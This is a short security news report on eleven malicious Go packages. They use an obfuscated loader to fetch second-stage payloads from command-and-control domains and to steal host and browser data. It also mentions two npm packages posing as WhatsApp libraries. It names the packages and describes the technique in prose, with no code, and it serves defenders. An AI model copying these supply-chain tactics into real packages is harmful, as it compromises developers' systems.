Cybersecurity researchers have uncovered a troubling discovery involving a set of 11 malicious Go packages capable of covertly downloading and executing harmful payloads on both Windows and Linux systems. The malware, identified by Socket’s Olivia Brown, employs a method that allows it to act stealthily by spawning a shell that retrieves second-stage payloads from various command-and-control endpoints, specifically .icu and .tech domains.
The compromised packages include github.com/stripedconsu/linker, github.com/agitatedleopa/stm, github.com/expertsandba/opt, among others. These packages harbor an obfuscated loader that fetches additional ELF and portable executable binaries, seeking to collect host information and access sensitive web browser data.
According to Brown, the malicious capabilities of these packages extend to Linux build servers and Windows workstations, thereby amplifying their threat and potential for widespread compromise. The decentralized structure of the Go ecosystem complicates matters, as developers often import modules directly from GitHub repositories, which could lead to confusion when searching for legitimate packages on platforms like pkg.go.dev.
The threat actor behind these packages appears to be operating alone, a conclusion drawn from similarities observed in the command-and-control structure and code format. This incident underscores the significant supply chain risk posed by the cross-platform nature of the Go programming language. The situation adds further complexity as coinciding findings reveal two npm packages, naya-flore and nvlore-hsc, which disguise themselves as WhatsApp socket libraries, yet contain functionalities capable of executing harmful commands on developer systems.